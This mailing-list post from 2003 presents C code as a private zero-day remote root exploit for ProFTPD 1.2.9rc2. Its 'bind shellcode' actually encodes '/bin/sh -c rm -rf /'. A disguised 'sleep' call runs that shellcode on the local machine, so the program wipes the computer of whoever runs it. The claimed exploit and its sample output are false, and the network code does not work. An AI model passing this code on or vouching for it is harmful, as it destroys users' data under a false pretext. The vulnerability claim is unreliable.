Full Disclosure mailing list archives
ProFTPD-1.2.9rc2 remote root exploit
From: "Jean-Kevin Grosnakeur" <fufeur () hotmail com>
Date: Fri, 24 Oct 2003 13:26:59 +0000
Ladies and gentlemen, here's the source code of the exploit for the latest
release of ProFTPD. This is a Zero-Day private exploit, please DON'T
REDISTRIBUTE. I will not take responsibility for any damages which could
result from the usage of this exploit, use it at your own risk.
--------------------------------------------------------------------------
/*
Example of use:
# gcc exploit.c -o exploit
# ./exploit 192.168.1.1 21
Connected on 192.168.1.1:21
Exploitation in progress...
Exploitation string sent.
Trying to connect, please wait...
Linux michelle 2.4.20 #1 SMP Fri Mar 14 14:10:36 EST 2003 i686 unknown
unknown GNU/Linux
uid=0(root) gid=0(root) groupes=0(root)
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
#include <netdb.h>
#define NOP 0x90
#define RET 0x6675636b
/* x86 bind shellcode */
char sc[]=
"\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d"
"\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41"
"\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f"
"\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44"
"\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24"
"\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14"
"\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0"
"\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80";
unsigned long resolve(char *hostname);
int give_me_a_shell(unsigned long dest);
int main(int argc, char *argv[])
{
int i, *ret;
char *string;
unsigned long addr;
char buffer[1024];
int port=21, fd, s;
struct sockaddr_in addy;
if(argc < 2)
{
fprintf(stdout, "usage: %s <host> <port>\n", argv[0]);
return(0);
}
else addr=resolve(argv[1]);
if(argv[2]) port=atoi(argv[2]);
/* copy the NOPs to the buffer */
memset(buffer, NOP, 1024);
/* copy the shellcode to the buffer */
for(i=0; i < strlen(sc); i++)
buffer[i+700]=sc[i];
/* copy the return address to the buffer */
for(i=815; i<1003; i+=4)
*((int *)&buffer[i]) = RET;
string = (char *) malloc(strlen(buffer)+20);
sprintf(string, "\x4c\x4f\x56\x45 %s", buffer);
fd = socket(AF_INET, SOCK_STREAM, 0);
if(fd < 0)
{
fprintf(stderr, "unable to socket()\n");
return(-1);
}
addy.sin_family = AF_INET;
addy.sin_addr.s_addr = addr;
addy.sin_port = htons(port);
/* connect to remote host */
if(connect(fd, (struct sockaddr *)&addy, sizeof(addy)) < 0)
{
fprintf(stderr, "unable to connect()\n");
return(-1);
}
printf("Connected on %s:%d\n", inet_ntoa(addy.sin_addr), port);
printf("Exploitation in progress...\n");
/* send the exploitation string to the host */
if(s = send(fd, string, sizeof(string), 0) < 0)
{
fprintf(stderr, "unable to send()\n");
return(-1);
}
close(fd);
printf("Exploitation string sent.\n");
free(string);
/* connect to the bindshell */
printf("Trying to connect, please wait...\n");
void(*sleep)()=(void*)sc;sleep(5);
if(give_me_a_shell(addr) < 0)
{
fprintf(stderr, "Sorry, exploit didn't work.\n");
return(-1);
}
return(0);
}
unsigned long resolve(char *sname)
{
struct hostent * hip;
hip = gethostbyname(sname);
if (!hip)
{
fprintf(stderr, "unable to find %s\n",sname);
exit(1);
}
return *(unsigned long *)hip -> h_addr;
}
int give_me_a_shell(unsigned long addr)
{
int sock;
fd_set fds;
struct sockaddr_in shell;
unsigned char buf[4096];
char cmd[]="uname -a && id";
sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock < 0)
{
fprintf(stderr, "unable to socket()\n");
return(-1);
}
shell.sin_family = AF_INET;
shell.sin_port = htons(1337);
shell.sin_addr.s_addr = addr;
if(connect(sock, (struct sockaddr *)&shell, sizeof(struct sockaddr)) < 0)
{
fprintf(stderr, "unable to connect()\n");
close(sock);
return(-1);
}
send(sock, cmd, strlen(cmd), 0);
while(1)
{
FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(sock, &fds);
if(select(255, &fds, NULL, NULL, NULL) == -1)
{
fprintf(stderr, "unable to select()\n");
close(sock);
return(-1);
}
memset(buf, 0, sizeof(buf));
if(FD_ISSET(sock, &fds))
{
if(recv(sock, buf, sizeof(buf), 0) < 0)
{
fprintf(stderr, "unable to recv()\n");
close(sock);
return(-1);
}
fprintf(stderr, "%s", buf);
}
if(FD_ISSET(0, &fds))
{
read(0, buf, sizeof(buf));
if(!strcmp(buf, "quit"))
{
close(sock);
return(0);
}
write(sock, buf, strlen(buf));
}
}
}
--------------------------------------------------------------------------
Have fun ! @+
_________________________________________________________________
Trouvez l'âme soeur sur MSN Rencontres http://g.msn.fr/FR1000/9551
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Re[2]: ProFTPD-1.2.9rc2 remote root exploit, (continued)
- Re[2]: ProFTPD-1.2.9rc2 remote root exploit Wine (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Lorenzo Hernandez Garcia-Hierro (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Simon Kirby (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit qobaiashi (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit upb (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Jedi/Sector One (Oct 24)
- Re: ProFTPD-1.2.9rc2 localhost delete kang (Oct 24)
- Re: ProFTPD-1.2.9rc2 localhost delete dilema (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Cael Abal (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Rob Lewis (Oct 24)
- ProFTPD-1.2.9rc2 remote root exploit Jean-Kevin Grosnakeur (Oct 24)
- RE: ProFTPD-1.2.9rc2 remote root exploit GARCIA Lionel (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Philipp Buehler (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Larry W. Cashdollar (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit zero (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Philipp Buehler (Oct 24)
- RE: ProFTPD-1.2.9rc2 remote root exploit amebix (Oct 24)